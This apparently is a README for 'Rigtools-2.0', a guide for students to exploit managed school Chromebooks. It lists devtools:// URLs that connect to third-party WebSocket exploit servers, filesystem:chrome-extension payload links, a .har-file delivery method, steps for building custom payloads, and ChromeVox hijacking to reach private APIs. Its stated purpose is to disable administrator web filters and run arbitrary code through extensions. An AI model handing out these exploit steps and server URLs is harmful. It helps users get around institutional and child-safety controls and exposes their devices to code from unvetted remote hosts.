Rigtools-2.0

THIS ONLY WORKS FOR CHROMEBOOK,NO WINDOWS OR ANYTHING* THE ULTIMATE RIGTOOLS GUIDE Rigtools is an exploit that allows users to run code on extensions, disable extensions, and basically do whatever they want with an extension as long as it has the correct permissions.IT IS PATCHED ON ALL CHROME VERSIONS 133 AND HIGHER =-( But not anymore,'cause I unpatched it! (wink)😧 What you need:

• A brain
• An internet connection
• Some school web filters (Obviously)
• Patience and common sense
• A chromebook on chrome version 133 or lower
• DevTools Console
• WebSocket Unblocked There are many components to this exploit...This is the only repository that fully explains it all.

How do you use it?

1. Open this link and just leave it alone. (Note: This will not run code it's just there to fix the second page.)

devtools://devtools/bundled/devtools_app.html

2. Open this link and go to Network.

devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rig.kxtz.dev/

3. Double-Click the black/grey box:

4.Wait for a bit...It should open a page that has a lot of red and purple buttons. TIP If it does not,(One of the problems when this exploit got patched) Then RIGHT CLICK THE GREY BOX and select "Open URL"

5. Click on the button named "Gforms Locked mode".

6.Behold:RIGTOOLS!!! You can disable extensions that you want. (A reminder,These may stop working after a few weeks,you might have to do it again.)

7. Finally,you can run code like "Hello World" or something like that through the extensions,there is a panel to execute javascript,in the page,when you scroll down a lot.

8.Go to

https://devtoolbypass.playcode.io/

Click "skip intro" and drag the button. This is a hyperlink to rigtools.(BWAHAHAHAH)

MORE IMPORTANT INFO -(A reminder,These may stop working after a few weeks,you might have to do it again.) -If GitHub or DevtoolBypass gets blocked,then save this URL by dragging it into your bookmarks bar or print it...just keep it safe!

data:text/html;charset=utf-8,devtools://devtools/bundled/devtools_app.html <p> <dev> devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rig.kxtz.dev/%20%20%20%20%20These%20are%20links%20to%20launch%20the%20unblock3r.%20%3Cp%3E%20%3Cdev%3E%20Use%20these%20links%20to%20get%20a%20HYPERLINK,a%20DIRECT%20link%20to%20RigTools%20devtools://devtools/bundled/devtools_app.html%20%3Cp%3E%20%3Cdev%3E%20filesystem:chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/temporary/index.html%20%3Cp%3E%20%3Cdev%3E%20The%20second%20one:%20filesystem:chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/persistent/rigtools.html

-They may make your computer a bit laggy,but nothing much,just some distortion of the mouse or something.

• If using a vpn,do not try and test or experiment around with this using "Metasploit" or any "Penetration testing" platforms.
• Be careful.That stuff can break your computers.BEWARE OF BROWSERS! 🙂
• If you know what I mean...😏
• There is a real second version,though.
• When you get to the original version,
• Scroll down a bit,until you find a button named "Update Rigtools".Click it.
• After,go to

rigtools.playcode.io

and that should work too,as a substitute version. If it does not work,drag the "filesystem" url into your bookmarks bar and spam click it!!

NEW "BLOAT" EXPLOIT

filesystem:chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/persistent/bloat.html

If you drag this into a new tab,it will probably close immediately. If it doesn't close and you get a cool-looking tab with a smiley emoticon and the words saying "#disabling... Happy days without blocking am I right"? Then all you have to do is wait a few minutes and the code is handed you you on a sliver platter! 🤤

It it does close,then figure out what Control+Shift+T does or search it up (It closes recently opened tabs) and open that tab (and,like usual,it will frustratingly close by itself)...And SPAM Control+Shift+T. It should work! =-)

For more info,about the bloat exploit,go to

https://bloatexploit.playcode.io/

IF YOU ONLY WANT THE DEVELOPER TOOLS,AND NO UNBLOCKER,THEN USE THIS:

filesystem:chrome-extension://mloajfnmjckfjbeeofcdaecbelnblden/temporary/index.html

This will only show the Javascript playground with the coding peice for people who know what they are doing and not the disable extensions part. =-P You have to install "Snap and Read" from the Chrome Web store,though.Just search it up and install it,before clicking "snap" when you launch it from the RigTools Dashboard.

IF THE WEBSOCKET URL DOES NOT WORK,WHAT HAPPENS?!

• The websocket url is the part that makes the button work,the one you click twice.
• Your admin may have set it,your chromebook is too high a version,whatever the problem,it's probably 'cause of the WebSocket.
• Thankfully,there are many devtools urls to LAUNCH rigtools,so,I got 'em listed here,if you want... WEBSOCKET DEVTOOLS LINKS: (Experimental,may not work...)
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=immortal2willlose.xyz:5505
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=tutoring.rainetax.com:5505/rig
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=schooling.sabe.com.ar:5505/rig
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rigtools.appleflyer.xyz:5505
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rigtools.appleflyer.xyz:5506

THESE ONES SHOULD PROBABLY WORK:

• devtools://devtools/bundled/devtools_app.html?experiments=true&wss=rig.ccsd.store
• devtools://devtools/bundled/devtools_app.html?experiments=true&wss=sincereham222.cc:8080
• devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rig.kxtz.dev/

HARTOOLS CODE EXTENSION EXECUTION

Unpatched!!

Extension/Devtools code execution

How to use

There are two ways you could use this. If your on <128 use the instructions, I will tell you what the second way is for users >133 later in this readme

$ git clone https://github.com/T3M1N4L/rigtools-updated-ui 
$ cd rigtools
$ npm i
# Create a file named `server_config.json`
# Then paste in `{"updater_url":"localhost:8080"}` (Or whatever your websocket URL is)
$ npm start

• Then visit devtools://devtools/bundled/devtools_app.html in your browser
• Open a new tab and visit devtools://devtools/bundled/devtools_app.html?experiments=true&ws=*websocket url*
• Click on Network
• Then click on the gray box twice

Hartools

crossjbly, and a few friends had figured out how to still use rigtools post-rigtools patch on 129-132 if javascript:// URLs are unblocked through the use of http archive files, aka .har files. If javascript:// URLs are Blocked this method only works until version 128 (patched on 129).

1. Download the latest .har file from the releases page
2. Get the .har file onto the device you want to run the devtools XSS on
3. On the device you want to run the devtools XSS on go to devtools://devtools/bundled/inspector.html

If devtools://devtools/bundled/inspector.html is blocked use the one of the following links

• devtools://devtools/bundled/js_app.html
• devtools://devtools/bundled/devtools_app.html
• devtools://devtools/bundled/worker_app.html

4. Once it FULLY loads, add ?experiments=true to the end of the URL and click enter. (ex. devtools://devtools/bundled/inspector.html?expirements=true)
5. Go to the Network tab. If you can't find it there should be a button on the topbar that looks like this >> and a dropdown should open in which you can select Network

^^^ if you are already on the network page you can skip this ^^^

6. Click the little upload button and upload the downloaded .har file

^^^ you may need to expand the sidebar to see it ^^^

7. Double click on the text that appears in the box [DOUBLE CLICK THIS]

Creating your own payloads

1. Clone the GitHub Repository: git clone https://github.com/t3m1n4l/rigtools-updated-ui
2. Change directory to rigtools-updated-ui: cd rigtools-updated-ui
3. The payload files are located in the payloads folder, edit those to your liking
4. Install dependencies: npm i
5. If you want to run the websocket server run npm run start
6. If you want to package your code to the .har file run npm run har-build

Terminology

• Entry
  • Entrypoint (or main script) when running devtools xss.
  • Payload
  • Script passed to extension to run code, such as disabling extensions.
• Chrome URLs
  • Elevated URLs that have extra access to features such as WebUI.
  • Only modify the entrypoint when necessary. If not modified properly, things such as the updater will break, do not remove any buttons and reuse ids.
• ChromeVox hijacking (EXPERIMENTAL, BETA)
  • Devtools payload (script ran by devtools://devtools to create an iframe to chromevox's logging page and run the entry script)
  • ChromeVox entry payload (script injected into the logging page to create the files for the evaluations page)
  • ChromeVox evaluations page (page that allows executing code as chromevox with access to private API's like accessibilityPrivate or settingsPrivate)

Release information

• Release 2.1.0
  • This release contains the following things
    • Experimental ChromeVox payload
• Release 2.0.0
  • This release contains the following things
    • .har file exploit furthering the use of rigtools in newer chrome versions
• Release 1.0.0
  • This release contains the following things
    • Better UI
    • Multiple extension presets
    • QoL features
• Release 0.0.1
  • This release contains the following things:
    • Updater
    • Extension debugging
    • Devtools debugging
    • Chrome url debugging.

Credits

• Exploit-master122: Creator of new repo and found unpatch in rigtools dev console launcher.
• unretained: Original rigtools developer tools code execution exploit (this literally wouldn't have been possible without rigtools lol)
• t3rm1n4l: Pioneering the new repo as well as improving ui and helping with QoL features
• Fallden4: QoL Features
• Miner49ur: Main developer of the updated ui, later improved and maintained by t3rm1n4l
• kxtzownsu: skid notice, figuring out that gforms locked mode extension has management perms
• Crossjbly: Finding the vulnerability in .har files
• Blobby Boi: Helping with development of the payloads and UI
• axqmx: Testing and help with development
• HarryJarry1: Creating XSS and with helping development
• fanqyxl: provided hosting through dev console
• Echo (3kh0): Created Extremover repo, which helped a lot in locating exploits
• Schoolexploitkid: Helped make LTMEAT source code accessable, (Exthang3r patch)
• Nedialosis: (Kid at my school) Helped me brainstorm ways to update the UI of it.

IF ALL GOES WELL,YOU SHOULD GET SOMETHING LIKE THIS: [https://drive.google.com/file/d/1y4mIywqM9s8eAngejJQIHhpYnfC67aOT/view]

One more thing,that relates to this project: IF GITHUB GETS BLOCKED,USE THIS

https://raw.githubusercontent.com/Exploit-Master12/RigTools-2.0/01790b954fd7bd2d0b701848e0b6e82197a05713/README.md

RANDOM PRANK (DO NOT GO TO THESE LINKS BWHAHAHAHAH) Really good proxy by Blobby-Boi XD

https://blobby-boi.github.io/RammerheadPR0XY/

For now,this will do...

And now you can do whatever you want on your computer.Use this wisely,and stay on task in class...At lunch,you could be hangin' out in the library with your friends playing bloxd.io or whatever... =-D 🙂

MORE STUFF COMING SOON -Follow for more exploits,Exploit-Master12 =-)